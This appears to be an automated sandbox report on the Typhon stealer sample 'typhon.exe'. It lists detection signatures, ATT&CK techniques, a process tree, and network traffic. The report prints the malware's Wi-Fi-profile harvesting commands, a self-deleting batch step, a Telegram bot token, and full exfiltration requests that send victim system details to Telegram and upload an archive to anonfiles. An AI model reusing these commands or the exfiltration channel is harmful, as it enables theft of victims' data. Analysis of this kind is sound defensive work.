typhon | b942051bc7005005adb60a5dae192214608a85ce473506ccaae10c3d23f851bc

Analysis

max time kernel
72s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2023, 13:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

typhon.exe
Size

2.3MB
MD5

d1d84c844681fe3c672a713c1a3bf52c
SHA1

099ec412993603c50ec87fd27c2315bd87b6fe7e
SHA256

a12933ab47993f5b6d09bec935163c7f077576a8b7b8362e397fe4f1ce4e791c
SHA512

3ee33d27c03f4b1e9977ea8b8905ec070cfc74adf4327dbb81923c2fa2df412d5f9d08b1d7e49c54ccf6333728a8e3c2ae278b79a214bb662854f8019dee25d0
SSDEEP

49152:8UbowEOvygS7/1sHOqJ02nTPFdRPqxMai2TBmCs2Odw+W7SC:8Ucwti78OqJ7TPB2Tc2Ou

Score

10^/10

typhon spyware stealer

Malware Config

Signatures

Detects Typhon stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/5036-133-0x0000000000190000-0x00000000003E2000-memory.dmp	family_typhon

Typhon
Typhon is a modular stealer written in C#.
stealer typhon

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	typhon.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ipinfo.io
45	api.ipify.org
54	api.ipify.org

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	typhon.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	typhon.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2936	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
432	taskkill.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe
5036	typhon.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	typhon.exe
Token: SeDebugPrivilege	432	taskkill.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 5036 wrote to memory of 3516	5036	typhon.exe	93
PID 5036 wrote to memory of 3516	5036	typhon.exe	93
PID 5036 wrote to memory of 3516	5036	typhon.exe	93
PID 3516 wrote to memory of 3116	3516	cmd.exe	95
PID 3516 wrote to memory of 3116	3516	cmd.exe	95
PID 3516 wrote to memory of 3116	3516	cmd.exe	95
PID 3516 wrote to memory of 3404	3516	cmd.exe	96
PID 3516 wrote to memory of 3404	3516	cmd.exe	96
PID 3516 wrote to memory of 3404	3516	cmd.exe	96
PID 3516 wrote to memory of 3688	3516	cmd.exe	97
PID 3516 wrote to memory of 3688	3516	cmd.exe	97
PID 3516 wrote to memory of 3688	3516	cmd.exe	97
PID 5036 wrote to memory of 860	5036	typhon.exe	98
PID 5036 wrote to memory of 860	5036	typhon.exe	98
PID 5036 wrote to memory of 860	5036	typhon.exe	98
PID 860 wrote to memory of 4000	860	cmd.exe	100
PID 860 wrote to memory of 4000	860	cmd.exe	100
PID 860 wrote to memory of 4000	860	cmd.exe	100
PID 860 wrote to memory of 3132	860	cmd.exe	101
PID 860 wrote to memory of 3132	860	cmd.exe	101
PID 860 wrote to memory of 3132	860	cmd.exe	101
PID 5036 wrote to memory of 4424	5036	typhon.exe	102
PID 5036 wrote to memory of 4424	5036	typhon.exe	102
PID 5036 wrote to memory of 4424	5036	typhon.exe	102
PID 4424 wrote to memory of 432	4424	cmd.exe	104
PID 4424 wrote to memory of 432	4424	cmd.exe	104
PID 4424 wrote to memory of 432	4424	cmd.exe	104
PID 4424 wrote to memory of 2936	4424	cmd.exe	105
PID 4424 wrote to memory of 2936	4424	cmd.exe	105
PID 4424 wrote to memory of 2936	4424	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\typhon.exe
"C:\Users\Admin\AppData\Local\Temp\typhon.exe"
1⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show profile
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\findstr.exe
    findstr All
    3⤵
    PID:3688
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:860
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\tmp5F2E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\typhon.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4424
- - C:\Windows\SysWOW64\taskkill.exe
    TaskKill /F /IM 5036
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- - C:\Windows\SysWOW64\timeout.exe
    Timeout /T 2 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2936

Network

DNS

151.122.125.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.122.125.40.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

1.202.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.202.248.87.in-addr.arpa

IN PTR

Response

1.202.248.87.in-addr.arpa

IN PTR

https-87-248-202-1amsllnwnet
DNS

8.3.197.209.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.3.197.209.in-addr.arpa

IN PTR

Response

8.3.197.209.in-addr.arpa

IN PTR

vip0x008map2sslhwcdnnet
DNS

ipinfo.io

typhon.exe

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
GET

http://ipinfo.io/json

typhon.exe

Remote address:

34.117.59.81:80

Request

GET /json HTTP/1.1
Host: ipinfo.io
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
x-content-type-options: nosniff
content-type: application/json; charset=utf-8
content-length: 269
date: Thu, 20 Apr 2023 13:20:03 GMT
x-envoy-upstream-service-time: 1
strict-transport-security: max-age=2592000; includeSubDomains
vary: Accept-Encoding
Via: 1.1 google
GET

http://ipinfo.io/json

typhon.exe

Remote address:

34.117.59.81:80

Request

GET /json HTTP/1.1
Host: ipinfo.io

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
x-content-type-options: nosniff
content-type: application/json; charset=utf-8
content-length: 269
date: Thu, 20 Apr 2023 13:20:05 GMT
x-envoy-upstream-service-time: 1
strict-transport-security: max-age=2592000; includeSubDomains
vary: Accept-Encoding
Via: 1.1 google
GET

http://ipinfo.io/json

typhon.exe

Remote address:

34.117.59.81:80

Request

GET /json HTTP/1.1
Host: ipinfo.io

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
x-content-type-options: nosniff
content-type: application/json; charset=utf-8
content-length: 269
date: Thu, 20 Apr 2023 13:20:55 GMT
x-envoy-upstream-service-time: 2
strict-transport-security: max-age=2592000; includeSubDomains
vary: Accept-Encoding
Via: 1.1 google
DNS

google.com

typhon.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.142
GET

https://google.com/

typhon.exe

Remote address:

142.250.179.142:443

Request

GET / HTTP/1.1
Host: google.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Location: https://www.google.com/
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0iQh_OkHV_K6ZL3-vqaFXQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Thu, 20 Apr 2023 13:20:04 GMT
Expires: Sat, 20 May 2023 13:20:04 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 220
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

api.telegram.org

typhon.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/getMe

typhon.exe

Remote address:

149.154.167.220:443

Request

GET /bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/getMe HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 20 Apr 2023 13:20:04 GMT
Content-Type: application/json
Content-Length: 194
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/sendMessage?chat_id=1924412993&text=%F0%9F%90%89%20New%20TyphonReborn%20log!%0A%0A%F0%9F%91%A4%20User%20details:%0ADate:%2020.04.2023%2015:20:02%0AUser%20name:%20Admin%0AMachine%20name:%20ROBKQPFG%0AAnti-Virus%20software:%20%0ANot%20installed%0A%0A%F0%9F%A5%B7%20System%20info:%0AOperating%20System:%20Windows%2010%20Pro%20x64%0AHWID:%20078BFBFF000306D2%0AProcessor:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AMemory:%2016154MB%0AGraphics%20card:%20Microsoft%20Basic%20Display%20Adapter%0ABattery%20status:%20NoSystemBattery,%20(1%25)%0AScreen%20metrics:%201280x720%0A%0A%F0%9F%93%A1%20Network%20details:%0AExternal%20IP:%20154.61.71.13%0AInternal%20IP:%2010.127.0.110%0AMAC%20address:%20DA4DA442263B%0ABSSID:%20a6:3d:03:85:e9:db%0A%0A%F0%9F%93%8D%20Location%20details:%0ABSSID-based%20location:%0AFailed%0AIP-Based%20location:%0ATimezone:%20Europe/Amsterdam%0D%0ACountry:%20NL%0D%0ARegion:%20North%20Holland%0D%0ACity:%20Aalsmeerderbrug%0D%0AZIP%20code:%201119%0D%0A%0A%0A%F0%9F%94%A2%20Important%20details:%0A%09%09%09%F0%9F%94%91%20Passwords%20amount:%200%0A%09%09%09%F0%9F%8D%AA%20Cookies%20amount:%200%0A%09%09%09%F0%9F%93%82%20Autofills%20amount:%200%0A%09%09%09%F0%9F%92%B3%20Credit%20Cards%20amount:%200%0A%09%09%09%F0%9F%93%A1%20FTP%20hosts%20amount:%200%0A%0A%F0%9F%94%97%20Archive%20Download%20Link:%20size%0ATyphonReborn%20v1.0%20by%20@lernaean_hydra0%20&%20@RaaSteK1337&disable_web_page_preview=True

typhon.exe

Remote address:

149.154.167.220:443

Request

GET /bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/sendMessage?chat_id=1924412993&text=%F0%9F%90%89%20New%20TyphonReborn%20log!%0A%0A%F0%9F%91%A4%20User%20details:%0ADate:%2020.04.2023%2015:20:02%0AUser%20name:%20Admin%0AMachine%20name:%20ROBKQPFG%0AAnti-Virus%20software:%20%0ANot%20installed%0A%0A%F0%9F%A5%B7%20System%20info:%0AOperating%20System:%20Windows%2010%20Pro%20x64%0AHWID:%20078BFBFF000306D2%0AProcessor:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AMemory:%2016154MB%0AGraphics%20card:%20Microsoft%20Basic%20Display%20Adapter%0ABattery%20status:%20NoSystemBattery,%20(1%25)%0AScreen%20metrics:%201280x720%0A%0A%F0%9F%93%A1%20Network%20details:%0AExternal%20IP:%20154.61.71.13%0AInternal%20IP:%2010.127.0.110%0AMAC%20address:%20DA4DA442263B%0ABSSID:%20a6:3d:03:85:e9:db%0A%0A%F0%9F%93%8D%20Location%20details:%0ABSSID-based%20location:%0AFailed%0AIP-Based%20location:%0ATimezone:%20Europe/Amsterdam%0D%0ACountry:%20NL%0D%0ARegion:%20North%20Holland%0D%0ACity:%20Aalsmeerderbrug%0D%0AZIP%20code:%201119%0D%0A%0A%0A%F0%9F%94%A2%20Important%20details:%0A%09%09%09%F0%9F%94%91%20Passwords%20amount:%200%0A%09%09%09%F0%9F%8D%AA%20Cookies%20amount:%200%0A%09%09%09%F0%9F%93%82%20Autofills%20amount:%200%0A%09%09%09%F0%9F%92%B3%20Credit%20Cards%20amount:%200%0A%09%09%09%F0%9F%93%A1%20FTP%20hosts%20amount:%200%0A%0A%F0%9F%94%97%20Archive%20Download%20Link:%20size%0ATyphonReborn%20v1.0%20by%20@lernaean_hydra0%20&%20@RaaSteK1337&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 20 Apr 2023 13:20:55 GMT
Content-Type: application/json
Content-Length: 1507
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

81.59.117.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.59.117.34.in-addr.arpa

IN PTR

Response

81.59.117.34.in-addr.arpa

IN PTR

815911734bcgoogleusercontentcom
DNS

142.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.179.250.142.in-addr.arpa

IN PTR

Response

142.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f141e100net
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

api.ipify.org

typhon.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN CNAME

api4.ipify.org

api4.ipify.org

IN A

64.185.227.155

api4.ipify.org

IN A

104.237.62.211

api4.ipify.org

IN A

173.231.16.77
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
GET

https://api.ipify.org/

typhon.exe

Remote address:

104.237.62.211:443

Request

GET / HTTP/1.1
Host: api.ipify.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 12
Content-Type: text/plain
Date: Thu, 20 Apr 2023 13:20:40 GMT
Vary: Origin
GET

https://api.ipify.org/

typhon.exe

Remote address:

104.237.62.211:443

Request

GET / HTTP/1.1
Host: api.ipify.org

Response

HTTP/1.1 200 OK

Content-Length: 12
Content-Type: text/plain
Date: Thu, 20 Apr 2023 13:20:54 GMT
Vary: Origin
DNS

211.62.237.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.62.237.104.in-addr.arpa

IN PTR

Response

211.62.237.104.in-addr.arpa

IN PTR

hosted-byracknerdcom
DNS

api.mylnikov.org

typhon.exe

Remote address:

8.8.8.8:53

Request

api.mylnikov.org

IN A

Response

api.mylnikov.org

IN A

172.67.196.114

api.mylnikov.org

IN A

104.21.44.66
GET

https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db

typhon.exe

Remote address:

172.67.196.114:443

Request

GET /geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 20 Apr 2023 13:20:40 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Thu, 20 Apr 2023 13:20:40 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4p9AQbiA0CpKDkSEXH4%2BqagUJIZg%2BIND%2FhC9cjabXU5pwP4TWCM7WLvBfFdG9ndUsCM%2BkiEwFYdaIgH7J6hujTIpLLyV02kEE4VNcRhVObKcatZ%2BbrIm5XyXa2f3ZTNhL2J"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 7badaf9d1b430bde-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db

typhon.exe

Remote address:

172.67.196.114:443

Request

GET /geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db HTTP/1.1
Host: api.mylnikov.org

Response

HTTP/1.1 200 OK

Date: Thu, 20 Apr 2023 13:20:55 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: HIT
Age: 15
Last-Modified: Thu, 20 Apr 2023 13:20:40 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GUh%2B8xh6wev%2Fltiw42iO7cjTHMzfvRBPZl5Vqi1JtVfdGNkeqqjVgfjxbxS80n%2Bwkdv2LaUnFStlmqL9qU9xWmEjlQxHJzyhZKvFRGcR4sKLn4qQKwEw5%2B7e4%2FUyJ%2BzmdAk7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 7badaff7debb0bde-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

114.196.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.196.67.172.in-addr.arpa

IN PTR

Response
DNS

api.anonfiles.com

typhon.exe

Remote address:

8.8.8.8:53

Request

api.anonfiles.com

IN A

Response

api.anonfiles.com

IN A

45.154.253.153

api.anonfiles.com

IN A

45.154.253.154
POST

https://api.anonfiles.com/upload

typhon.exe

Remote address:

45.154.253.153:443

Request

POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8db41b2d39624ff
Host: api.anonfiles.com
Content-Length: 65735
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 20 Apr 2023 13:20:53 GMT
Content-Type: application/json
Content-Length: 374
Connection: keep-alive
Vary: Accept-Encoding
Access-Control-Allow-Origin: https://anonfiles.com
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,X-CSRF-Token,Cookie,X-API-Token
Access-Control-Expose-Headers: Content-Length,Content-Range
Access-Control-Allow-Credentials: true
DNS

153.253.154.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.253.154.45.in-addr.arpa

IN PTR

Response

153.253.154.45.in-addr.arpa

IN PTR

shared07cust05proxyis
DNS

153.253.154.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.253.154.45.in-addr.arpa

IN PTR

Response

153.253.154.45.in-addr.arpa

IN PTR

shared07cust05proxyis

34.117.59.81:80

http://ipinfo.io/json

http

typhon.exe

543 B
2.1kB
9
7

HTTP Request

GET http://ipinfo.io/json

HTTP Response

200

HTTP Request

GET http://ipinfo.io/json

HTTP Response

200

HTTP Request

GET http://ipinfo.io/json

HTTP Response

200
142.250.179.142:443

https://google.com/

tls, http

typhon.exe

802 B
8.2kB
10
10

HTTP Request

GET https://google.com/

HTTP Response

301
149.154.167.220:443

https://api.telegram.org/bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/sendMessage?chat_id=1924412993&text=%F0%9F%90%89%20New%20TyphonReborn%20log!%0A%0A%F0%9F%91%A4%20User%20details:%0ADate:%2020.04.2023%2015:20:02%0AUser%20name:%20Admin%0AMachine%20name:%20ROBKQPFG%0AAnti-Virus%20software:%20%0ANot%20installed%0A%0A%F0%9F%A5%B7%20System%20info:%0AOperating%20System:%20Windows%2010%20Pro%20x64%0AHWID:%20078BFBFF000306D2%0AProcessor:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AMemory:%2016154MB%0AGraphics%20card:%20Microsoft%20Basic%20Display%20Adapter%0ABattery%20status:%20NoSystemBattery,%20(1%25)%0AScreen%20metrics:%201280x720%0A%0A%F0%9F%93%A1%20Network%20details:%0AExternal%20IP:%20154.61.71.13%0AInternal%20IP:%2010.127.0.110%0AMAC%20address:%20DA4DA442263B%0ABSSID:%20a6:3d:03:85:e9:db%0A%0A%F0%9F%93%8D%20Location%20details:%0ABSSID-based%20location:%0AFailed%0AIP-Based%20location:%0ATimezone:%20Europe/Amsterdam%0D%0ACountry:%20NL%0D%0ARegion:%20North%20Holland%0D%0ACity:%20Aalsmeerderbrug%0D%0AZIP%20code:%201119%0D%0A%0A%0A%F0%9F%94%A2%20Important%20details:%0A%09%09%09%F0%9F%94%91%20Passwords%20amount:%200%0A%09%09%09%F0%9F%8D%AA%20Cookies%20amount:%200%0A%09%09%09%F0%9F%93%82%20Autofills%20amount:%200%0A%09%09%09%F0%9F%92%B3%20Credit%20Cards%20amount:%200%0A%09%09%09%F0%9F%93%A1%20FTP%20hosts%20amount:%200%0A%0A%F0%9F%94%97%20Archive%20Download%20Link:%20size%0ATyphonReborn%20v1.0%20by%20@lernaean_hydra0%20&%20@RaaSteK1337&disable_web_page_preview=True

tls, http

typhon.exe

4.2kB
9.0kB
15
15

HTTP Request

GET https://api.telegram.org/bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/getMe

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot5752903555:AAHtxrn5SnThmhwZv9h8xmn-sUqz-jHcIp4/sendMessage?chat_id=1924412993&text=%F0%9F%90%89%20New%20TyphonReborn%20log!%0A%0A%F0%9F%91%A4%20User%20details:%0ADate:%2020.04.2023%2015:20:02%0AUser%20name:%20Admin%0AMachine%20name:%20ROBKQPFG%0AAnti-Virus%20software:%20%0ANot%20installed%0A%0A%F0%9F%A5%B7%20System%20info:%0AOperating%20System:%20Windows%2010%20Pro%20x64%0AHWID:%20078BFBFF000306D2%0AProcessor:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AMemory:%2016154MB%0AGraphics%20card:%20Microsoft%20Basic%20Display%20Adapter%0ABattery%20status:%20NoSystemBattery,%20(1%25)%0AScreen%20metrics:%201280x720%0A%0A%F0%9F%93%A1%20Network%20details:%0AExternal%20IP:%20154.61.71.13%0AInternal%20IP:%2010.127.0.110%0AMAC%20address:%20DA4DA442263B%0ABSSID:%20a6:3d:03:85:e9:db%0A%0A%F0%9F%93%8D%20Location%20details:%0ABSSID-based%20location:%0AFailed%0AIP-Based%20location:%0ATimezone:%20Europe/Amsterdam%0D%0ACountry:%20NL%0D%0ARegion:%20North%20Holland%0D%0ACity:%20Aalsmeerderbrug%0D%0AZIP%20code:%201119%0D%0A%0A%0A%F0%9F%94%A2%20Important%20details:%0A%09%09%09%F0%9F%94%91%20Passwords%20amount:%200%0A%09%09%09%F0%9F%8D%AA%20Cookies%20amount:%200%0A%09%09%09%F0%9F%93%82%20Autofills%20amount:%200%0A%09%09%09%F0%9F%92%B3%20Credit%20Cards%20amount:%200%0A%09%09%09%F0%9F%93%A1%20FTP%20hosts%20amount:%200%0A%0A%F0%9F%94%97%20Archive%20Download%20Link:%20size%0ATyphonReborn%20v1.0%20by%20@lernaean_hydra0%20&%20@RaaSteK1337&disable_web_page_preview=True

HTTP Response

200
64.185.227.155:443

api.ipify.org

typhon.exe

260 B
5
104.237.62.211:443

https://api.ipify.org/

tls, http

typhon.exe

1.6kB
7.0kB
16
10

HTTP Request

GET https://api.ipify.org/

HTTP Response

200

HTTP Request

GET https://api.ipify.org/

HTTP Response

200
20.50.201.200:443

322 B
7
172.67.196.114:443

https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db

tls, http

typhon.exe

991 B
5.0kB
10
9

HTTP Request

GET https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db

HTTP Response

200

HTTP Request

GET https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=a6:3d:03:85:e9:db

HTTP Response

200
45.154.253.153:443

https://api.anonfiles.com/upload

tls, http

typhon.exe

77.4kB
7.0kB
65
35

HTTP Request

POST https://api.anonfiles.com/upload

HTTP Response

200
93.184.221.240:80

322 B
7
117.18.237.29:80

322 B
7
93.184.221.240:80

322 B
7

8.8.8.8:53

151.122.125.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

151.122.125.40.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

1.202.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.202.248.87.in-addr.arpa
8.8.8.8:53

8.3.197.209.in-addr.arpa

dns

70 B
111 B
1
1

DNS Request

8.3.197.209.in-addr.arpa
8.8.8.8:53

ipinfo.io

dns

typhon.exe

55 B
71 B
1
1

DNS Request

ipinfo.io

DNS Response

34.117.59.81
8.8.8.8:53

google.com

dns

typhon.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.142
8.8.8.8:53

api.telegram.org

dns

typhon.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

81.59.117.34.in-addr.arpa

dns

71 B
122 B
1
1

DNS Request

81.59.117.34.in-addr.arpa
8.8.8.8:53

142.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

142.179.250.142.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

api.ipify.org

dns

typhon.exe

59 B
126 B
1
1

DNS Request

api.ipify.org

DNS Response

64.185.227.155

104.237.62.211

173.231.16.77
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

211.62.237.104.in-addr.arpa

dns

73 B
109 B
1
1

DNS Request

211.62.237.104.in-addr.arpa
8.8.8.8:53

api.mylnikov.org

dns

typhon.exe

62 B
94 B
1
1

DNS Request

api.mylnikov.org

DNS Response

172.67.196.114

104.21.44.66
8.8.8.8:53

114.196.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

114.196.67.172.in-addr.arpa
8.8.8.8:53

api.anonfiles.com

dns

typhon.exe

63 B
95 B
1
1

DNS Request

api.anonfiles.com

DNS Response

45.154.253.153

45.154.253.154
8.8.8.8:53

153.253.154.45.in-addr.arpa

dns

146 B
222 B
2
2

DNS Request

153.253.154.45.in-addr.arpa

DNS Request

153.253.154.45.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ReporterLogs\System Info\Running Processes.txt

Filesize
4KB

MD5
a5f4c6e475a560246eeea9f0675f1415

SHA1
4aa7020663d260350a59d1cc2d4ad018046b5a1d

SHA256
9b3c04deab2695d4192176b38f7335951bd1031ce8442e1f640f255b773f8564

SHA512
